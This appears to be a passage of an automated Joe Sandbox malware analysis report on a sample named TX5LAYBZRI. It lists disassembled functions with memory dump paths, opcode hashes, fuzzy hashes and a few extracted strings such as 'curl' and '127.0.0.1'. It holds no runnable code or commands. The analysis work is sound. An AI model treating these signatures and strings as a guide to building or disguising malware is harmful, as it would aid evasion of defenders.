                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Downgrades to HTTP/1.1$multi.c
                                            • API String ID: 0-3089350377
                                            • Opcode ID: 94a3920ec97b182d57d39b84eae88fa47358c16ee5bdc2e72df784fe8908f31f
                                            • Instruction ID: 53e3852258d31f4daf628353223658232c618a5c5638978e8ff125cdbe601e33
                                            • Opcode Fuzzy Hash: 94a3920ec97b182d57d39b84eae88fa47358c16ee5bdc2e72df784fe8908f31f
                                            • Instruction Fuzzy Hash: BFC11671A0C701ABD750DF28D88176AB7E0FF96314F0849BCF48997292E771E958CB92
                                            Function 00C58F90 Relevance: 2.8, Strings: 2, Instructions: 256COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 127.0.0.1$::1
                                            • API String ID: 0-3302937015
                                            • Opcode ID: 25b094be41ba8e324644b3c628c708ecdd08fc09b99710bb5d2d786a033b1ee7
                                            • Instruction ID: 03bbd4d6dcd2ff410fe91c3880620c8e95d62b9f068ed2e27249fe10f27a7048
                                            • Opcode Fuzzy Hash: 25b094be41ba8e324644b3c628c708ecdd08fc09b99710bb5d2d786a033b1ee7
                                            • Instruction Fuzzy Hash: 5EA1B9B5C04742DBE700DF21C84576AB7A0FF99300F158A69EC898B261F770EAD4D796
                                            Function 00EE56D0 Relevance: 2.3, Strings: 1, Instructions: 1067COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BQ`
                                            • API String ID: 0-1649249777
                                            • Opcode ID: ab65973e656852fd4e20d49a32daa31f5a8fc9dc124974d9ce0468dbd2704513
                                            • Instruction ID: 9d3c1c5a59e5d0652cb2f60f9d5185f300d48e6b98631f8270b7ed8c9429bdd7
                                            • Opcode Fuzzy Hash: ab65973e656852fd4e20d49a32daa31f5a8fc9dc124974d9ce0468dbd2704513
                                            • Instruction Fuzzy Hash: F1A2AF71608799CFCB14CF1AC4906A9BBE1FF98358F15866DE8A99B391D330E940CF91
                                            Function 00C5E3E0 Relevance: 1.8, Strings: 1, Instructions: 550COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \
                                            • API String ID: 0-2967466578
                                            • Opcode ID: 8d4b1bac8beddce43741f040a3fba70215d1e10b1da2507d2d9b8d44a5203aa0
                                            • Instruction ID: 7aee4669abb579fafb77d0cab8e5ef3f172244f19c5273cdf3685c2570966a7f
                                            • Opcode Fuzzy Hash: 8d4b1bac8beddce43741f040a3fba70215d1e10b1da2507d2d9b8d44a5203aa0
                                            • Instruction Fuzzy Hash: 1102076E9083056BE724AA25DC41B2B76D89F50346F444839FC9987183F631EF8CD7AB
                                            Function 00EF7CC0 Relevance: 1.8, Strings: 1, Instructions: 516COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D
                                            • API String ID: 0-2746444292
                                            • Opcode ID: e2b941407947bc7e14958a579725416c28e54f29a52ea05c8b83999412471686
                                            • Instruction ID: b6ab2aa293bdb5a60d5457cdd889bdb0d43b1ad596807006afaaeb7726b6d50a
                                            • Opcode Fuzzy Hash: e2b941407947bc7e14958a579725416c28e54f29a52ea05c8b83999412471686
                                            • Instruction Fuzzy Hash: F2329E72A0D3458BC725DF28D4806AEF7E1BFC9308F159A2DE9D963351DB30A945CB82
                                            Function 00C600E0 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: H
                                            • API String ID: 0-2852464175
                                            • Opcode ID: 1281377b405c0dc38d01eef89cd8e034a28f4da2052d324015ae81e99efa89f5
                                            • Instruction ID: 916255dcf8b3d3494f94e67238d3ec77d12ae9d28e11bc8551e7109da2a2a9b3
                                            • Opcode Fuzzy Hash: 1281377b405c0dc38d01eef89cd8e034a28f4da2052d324015ae81e99efa89f5
                                            • Instruction Fuzzy Hash: 8F9192317083518FCB29CE19C4D052FB7E3AFC9314F2A857DD996A7391DA31AC468B86
                                            Function 00BFB560 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: curl
                                            • API String ID: 0-65018701
                                            • Opcode ID: 903ea04144e74f738a664c9e0149c7ea8e6c3f18252d2b46e2ec538be1013199
                                            • Instruction ID: 0b9f9b25c3f0c47094b4d645dbfb3a5866812ca9184d2ecd90267f77829a2551
                                            • Opcode Fuzzy Hash: 903ea04144e74f738a664c9e0149c7ea8e6c3f18252d2b46e2ec538be1013199
                                            • Instruction Fuzzy Hash: 086196B18087449BD721DF14D881BEBB3E8AF99304F04962DFD489B212EB71E698D752
                                            Function 079404BA Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A:\
                                            • API String ID: 0-3379428675
                                            • Opcode ID: 922881fc7ef15fcdcade65b4e44aaefe2accb7c2bc3b011725f478970b616bb4
                                            • Instruction ID: f99c548d939954bdf62f83ef22361dae9638ae46f20d4a424dfa381e61e2d9b1
                                            • Opcode Fuzzy Hash: 922881fc7ef15fcdcade65b4e44aaefe2accb7c2bc3b011725f478970b616bb4
                                            • Instruction Fuzzy Hash: 7711AFFB26D021BD3151908E2B10DF76A6DE5C7778B3089A7FA5BC6140E2C80B5961B1
                                            Function 00EAAE30 Relevance: .6, Instructions: 598COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                            • Instruction ID: 2cae1fb33664fdb15e84105751ad8d442afbcd7cf79535d96c21a53b2f94e8cc
                                            • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                            • Instruction Fuzzy Hash: DF2264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                            Function 00F0CD80 Relevance: .6, Instructions: 574COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 722f239b897cac5e1a4d8c430c26ccd9f9d97e6cc300e6e940f125c6d523148c
                                            • Instruction ID: 855478353c4ffffeb08510c0eee672415212c7a908a05dc7a027448a5e38e14a
                                            • Opcode Fuzzy Hash: 722f239b897cac5e1a4d8c430c26ccd9f9d97e6cc300e6e940f125c6d523148c
                                            • Instruction Fuzzy Hash: 7812C676F483154BC30CED6DC992359FAD75BC8310F1A893EA85DDB3A0E9B9EC014681
                                            Function 00E49C80 Relevance: .5, Instructions: 451COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3eb5461328efb87861e9783b3581e7f2d97aa883510f9df698f5ad02820d1331
                                            • Instruction ID: aed6eacc40b0d3e1b76abcabcbb9f378fa09ca89ea130d45577a8787e2bf5b0e
                                            • Opcode Fuzzy Hash: 3eb5461328efb87861e9783b3581e7f2d97aa883510f9df698f5ad02820d1331
                                            • Instruction Fuzzy Hash: 25121D37B515198FEB44DEA5D8483DBB3A2FF9C318F6A9534CD48AB607C635B502CA80
                                            Function 00B9CBB0 Relevance: .4, Instructions: 408COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 898aa8b7f3d61732cd751120776b503b6d169777c56b303a4c1b9c60023ca820
                                            • Instruction ID: 4243fe9918d98a6c36c6aa299a1652891feded4c89c06bf5fe0ff5fddcb85328
                                            • Opcode Fuzzy Hash: 898aa8b7f3d61732cd751120776b503b6d169777c56b303a4c1b9c60023ca820
                                            • Instruction Fuzzy Hash: 0DE135309083158BDB24CF19C48036ABFE2FB95390F2485BDE4998B396D738ED469BC1
                                            Function 00EE4410 Relevance: .3, Instructions: 316COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
